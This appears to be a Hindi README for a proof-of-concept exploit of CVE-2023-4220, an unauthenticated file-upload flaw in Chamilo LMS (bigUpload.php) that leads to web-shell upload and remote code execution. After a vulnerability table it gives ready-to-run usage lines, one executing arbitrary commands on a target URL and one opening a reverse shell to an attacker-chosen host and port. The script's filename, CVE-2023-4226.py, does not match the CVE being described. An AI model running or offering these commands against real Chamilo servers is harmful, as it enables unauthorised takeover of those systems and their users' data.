
CVE-2023-4220 के लिए POC - Chamilo LMS में बिना प्रमाणीकरण के बड़ी फ़ाइल अपलोड द्वारा रिमोट कोड निष्पादन
| उत्पाद | Chamilo |
|---|
| विक्रेता | Chamilo |
| गंभीरता | उच्च - प्रतिद्वंद्वी सॉफ़्टवेयर कमजोरियों का शोषण करके बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन प्राप्त कर सकते हैं। |
| प्रभावित संस्करण | <= v1.11.24 |
| परीक्षण किए गए संस्करण | v1.11.24 (लेखन के समय नवीनतम संस्करण) |
| CVE पहचानकर्ता | CVE-2023-4220 |
| CVE विवरण | Chamilo LMS <= v1.11.24 में /main/inc/lib/javascript/bigupload/inc/bigUpload.php में बड़ी फ़ाइल अपलोड कार्यक्षमता में अप्रतिबंधित फ़ाइल अपलोड, बिना प्रमाणीकरण के हमलावरों को संग्रहीत क्रॉस-साइट स्क्रिप्टिंग हमले करने और वेब शेल अपलोड करके दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है। |
| CWE वर्गीकरण | CWE-434: खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड |
| CAPEC वर्गीकरण | CAPEC-650: वेब सर्वर पर वेब शेल अपलोड करना |
सीधे कमांड निष्पादित करने के लिए, निम्नलिखित कमांड का उपयोग करें:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
रिवर्स शेल प्राप्त करने के लिए, निम्नलिखित कमांड का उपयोग करें:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>